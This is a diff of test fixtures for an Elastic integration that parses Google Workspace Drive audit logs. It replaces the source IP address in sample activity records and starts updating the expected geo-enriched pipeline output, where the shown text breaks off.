-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_to_folder","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_canceled","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_comment_added","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_requested","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"approval_reviewer_responded","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"create","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"delete","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"download","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"edit","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"add_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"move","parameters":[{"name":"billable","boolValue":false},{"name":"destination_folder_id","value":"1234"},{"name":"destination_folder_title","value":"folder title"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"preview","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"print","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_from_folder","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"source_folder_id","value":"1234"},{"name":"source_folder_title","value":"a folder title"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"rename","parameters":[{"name":"billable","boolValue":true},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"bar.gif"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_value","value":"foo.gif","new_value":"bar.gif"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"untrash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"sheets_import_range","parameters":[{"name":"sheets_import_range_recipient_doc","value":"1234"},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"trash","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"remove_lock","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"upload","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"access","name":"view","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"shared_drive_id","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_acl_editors","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_access_scope","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_document_visibility","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"owner"},{"name":"old_value","value":"writers"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_visibility","value":"people_within_domain_with_link"},{"name":"visibility_change","value":"external"},{"name":"target_domain","value":"all"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_membership_change","parameters":[{"name":"added_role","value":"editor"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"removed_role","value":"content_manager"},{"name":"membership_change_type","value":"add_to_shared_drive"},{"name":"target","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"shared_drive_settings_change","parameters":[{"name":"new_settings_state","value":"restricted"},{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"old_settings_state","value":"unrestricted"},{"name":"shared_drive_settings_change_type","value":"direct_acl"},{"name":"target","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"sheets_import_range_access_change","parameters":[{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"visibility","value":"people_with_link"},{"name":"sheets_import_range_recipient_doc","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"drive","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"acl_change","name":"change_user_access","parameters":[{"name":"billable","boolValue":false},{"name":"doc_id","value":"1234"},{"name":"doc_title","value":"document title"},{"name":"doc_type","value":"document"},{"name":"new_value","value":"can_comment"},{"name":"old_value","value":"can_view"},{"name":"old_visibility","value":"people_with_link"},{"name":"originating_app_id","value":"1234"},{"name":"owner","value":"owner@example.com"},{"name":"owner_is_shared_drive","boolValue":false},{"name":"primary_event","boolValue":true},{"name":"target_user","value":"user@example.com"},{"name":"visibility","value":"private"},{"name":"visibility_change","value":"external"}]}} diff --git a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json index db0bcf7adbb..3640b63aa91 100644 --- a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json +++ b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json @@ -2,31 +2,13 @@ "expected": [ { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 